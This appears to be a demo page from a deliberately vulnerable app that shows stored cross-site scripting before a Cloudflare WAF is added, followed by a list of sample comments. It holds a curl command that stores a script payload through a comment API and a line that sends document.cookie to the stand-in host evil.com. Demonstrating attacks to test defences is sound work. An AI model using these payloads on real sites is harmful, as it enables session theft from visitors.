What is Cross-Site Scripting (XSS)?
XSS flaws occur whenever an application includes untrusted data in a web page without proper validation or escaping. Stored XSS persists on the server and executes for all users who view the content.
Common Exploits:
- Steal session cookies with document.cookie
- Keylogging user input on the page
- Phishing attacks modifying page content
- Redirect users to malicious sites
- Execute actions on behalf of the user
Before WAF: Vulnerable
Without Cloudflare WAF, XSS payloads execute in visitors' browsers
Post XSS Payload:
Or use cURL:
# Store XSS payload
curl -X POST "<your-worker-url>/api/comment" \
-H "Content-Type: application/json" \
-d '{"content":"<script>alert('XSS')</script>"}'
# Script executes when anyone views comments!
# Steal cookies: <script>fetch('evil.com?c='+document.cookie)</script>Vulnerability: User input stored and rendered without HTML sanitization.
Comments (XSS Executes Here)
View stored comments - scripts will execute!
john_doe2/19/2026, 1:16:58 AM
john_doe2/19/2026, 12:13:28 AM
john_doe2/19/2026, 12:13:12 AM
grace_hopper2/18/2026, 11:53:28 PM
Just completed my security training!
frank_castle2/18/2026, 11:38:28 PM
The admin page is at /admin
eve_online2/18/2026, 11:08:28 PM
Testing the comment system.
diana_prince2/18/2026, 6:08:28 PM
Found a vulnerability!
charlie_day2/18/2026, 12:08:28 PM
Can someone help me with authentication?